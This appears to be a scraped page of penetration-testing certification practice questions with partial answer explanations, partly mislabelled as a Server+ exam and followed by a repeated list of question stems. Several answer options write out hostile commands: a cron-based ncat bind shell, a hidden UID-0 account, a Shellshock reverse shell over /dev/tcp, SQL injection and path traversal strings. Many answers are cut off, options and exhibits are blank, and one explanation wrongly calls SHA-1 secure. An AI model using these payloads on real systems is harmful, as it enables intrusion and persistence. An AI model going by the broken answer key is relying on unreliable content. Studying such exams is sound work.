Question 1

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
A) schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
B) wmic startup get caption,command
C) crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D) sudo useradd -ou 0 -g 0 user

Accepted Answer

The answer of A penetration tester was able to gain...

Question 2

Which of the following is the MOST effective person to validate results from a penetration test?
A) Third party
B) Team leader
C) Chief Information Officer
D) Client

Accepted Answer

The answer of Which of the following is the MOST...

Question 3

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number> . Which of the following would be the best action for the tester to take NEXT with this information?
A) Create a custom password dictionary as preparation for password spray testing.
B) Recommend using a password manage/vault instead of text files to store passwords securely.
C) Recommend configuring password complexity rules in all the systems and applications.
D) Document the unprotected file repository as a finding in the penetration-testing report.

Accepted Answer

The tester should document the unprotected file repository as a finding in the penetration-testing report to ensure that the issue is formally recognized and addressed by the organization.

Question 4

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?
A) Root user
B) Local administrator
C) Service
D) Network administrator

Accepted Answer

The answer of A penetration tester has been hired to...

Question 5

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?
A) MD5
B) bcrypt
C) SHA-1
D) PBKDF2

Accepted Answer

MD5 is a fast hashing algorithm that is vulnerable to precomputed attacks like rainbow tables, making it easier to crack compared to more secure algorithms like bcrypt, SHA-1, or PBKDF2.

Question 6

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?
A) OpenVAS
B) Drozer
C) Burp Suite
D) OWASP ZAP

Accepted Answer

OpenVAS is a vulnerability scanner that can be used to identify vulnerabilities and associated exploits on open ports.

Question 7

A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
A) Forensically acquire the backdoor Trojan and perform attribution
B) Utilize the backdoor in support of the engagement
C) Continue the engagement and include the backdoor finding in the final report
D) Inform the customer immediately about the backdoor

Accepted Answer

The answer of A penetration tester discovers that a web...

Question 8

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:  Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A) Edit the discovered file with one line of code for remote callback
B) Download .pl files and look for usernames and passwords
C) Edit the smb.conf file and upload it to the server
D) Download the smb.conf file and look at configurations

Accepted Answer

The answer of A penetration tester discovered a vulnerability that...

Question 9

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?
A) "cisco-ios" "admin+1234"
B) "cisco-ios" "no-password"
C) "cisco-ios" "default-passwords"
D) "cisco-ios" "last-modified"

Accepted Answer

The answer of A large client wants a penetration tester...

Question 10

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A) exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B) exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
C) exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D) exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Accepted Answer

The answer of A penetration tester discovers a vulnerable web...

Question 11

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?
A) HTTPS communication
B) Public and private keys
C) Password encryption
D) Sessions and cookies

Accepted Answer

Sessions and cookies are used to maintain state in the HTTP protocol after a user logs in, making them a target for gaining control.

Question 12

A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:  Which of the following would be a recommendation for remediation?
A) Deploy a user training program
B) Implement a patch management plan
C) Utilize the secure software development life cycle
D) Configure access controls on each of the servers

Accepted Answer

The answer of A penetration tester conducted a vulnerability scan...

Question 13

Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
A) will reveal vulnerabilities in the Modbus protocol.
B) may cause unintended failures in control systems.
C) may reduce the true positive rate of findings.
D) will create a denial-of-service condition on the IP networks.

Accepted Answer

Running a vulnerability scanner on industrial control systems can disrupt their operations, potentially causing unintended failures due to their sensitivity to network traffic.

Question 14

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
A) John the Ripper
B) Hydra
C) Mimikatz
D) Cain and Abel

Accepted Answer

The unshadow command is used to combine the contents of the /etc/passwd and /etc/shadow files into a format that can be used by password cracking tools. John the Ripper is a popular tool for cracking passwords from such combined files.

Question 15

A penetration tester performs the following command: curl -I -http2 https://www.comptia.org Which of the following snippets of output will the tester MOST likely receive?
A) 
B) 
C) 
D) [########################################################] 100%

Accepted Answer

The answer of A penetration tester performs the following command:...

Question 16

A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website? A) B) ../../../../../../../../../../etc/passwd C) /var/www/html/index.php;whoami D) 1 UNION SELECT 1, DATABASE(),3--

Accepted Answer

The answer of A tester who is performing a penetration...

Question 17

A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
A) The reverse-engineering team may have a history of selling exploits to third parties.
B) The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
C) The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
D) The reverse-engineering team will be given access to source code for analysis.

Accepted Answer

The answer of A company that developers embedded software for...

Question 18

A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?
A) Phishing
B) Tailgating
C) Baiting
D) Shoulder surfing

Accepted Answer

Baiting involves offering something enticing to the victim, such as a gift, to gain access to sensitive information or systems. In this scenario, the external hard drive serves as the bait.

Question 19

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
A) A firewall or IPS blocked the scan.
B) The penetration tester used unsupported flags.
C) The edge network device was disconnected.
D) The scan returned ICMP echo replies.

Accepted Answer

A firewall or IPS likely blocked the scan, causing all ports to appear filtered.

Question 20

The results of an Nmap scan are as follows:  Which of the following would be the BEST conclusion about this device?
A) This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
B) This device is most likely a gateway with in-band management services.
C) This device is most likely a proxy server forwarding requests over TCP/443.
D) This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

Accepted Answer

The answer of The results of an Nmap scan are...

Exam 13: CompTIA Server+

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?

Which of the following is the MOST effective person to validate results from a penetration test?

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

A penetration tester conducted a vulnerability scan against a client's critical servers and found the following: Which of the following would be a recommendation for remediation?

Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

A penetration tester performs the following command: curl -I -http2 https://www.comptia.org Which of the following snippets of output will the tester MOST likely receive?

A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website?

The results of an Nmap scan are as follows: Which of the following would be the BEST conclusion about this device?